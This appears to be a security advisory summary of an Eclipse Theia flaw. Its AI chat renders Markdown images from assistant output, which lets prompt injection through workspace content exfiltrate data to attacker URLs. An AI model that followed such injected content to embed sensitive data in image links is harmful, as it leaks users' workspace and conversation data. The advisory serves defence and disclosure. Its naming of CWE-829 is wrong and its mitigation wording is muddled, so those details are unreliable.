In Eclipse Theia versions before 1.71.0 the AI chat feature renders any Markdown image tags produced by an AI assistant, causing the client to issue HTTP requests to external URLs without any restriction. This behavior allows an attacker who can control the content of a workspace or injection into the AI prompt to cause the client to send requests to attacker‑controlled servers that embed data from the workspace or conversation context, effectively exfiltrating sensitive information. The weakness aligns with CWE‑201 (Information Exposure) and CWE‑829 (Access Control of Removed Data).

Any deployment of Eclipse Theia running a version older than 1.71.0 is affected. The vulnerability exists regardless of the operating system or host environment due to the universal nature of the Markdown rendering in the AI chat component.

The CVSS score of 6.7 indicates moderate severity. EPSS information is unavailable, and the vulnerability is not listed in CISA’s KEV catalog, suggesting no confirmed exploits yet. The likely attack vector requires the attacker to influence AI responses in an untrusted workspace; the attack chain would entail injecting or modifying workspace content to generate image URLs that expose confidential data. As mitigating action, all versions prior to 1.71.0 can be patched to disable AI features in untrusted workspaces, substantially reducing the exploitation risk.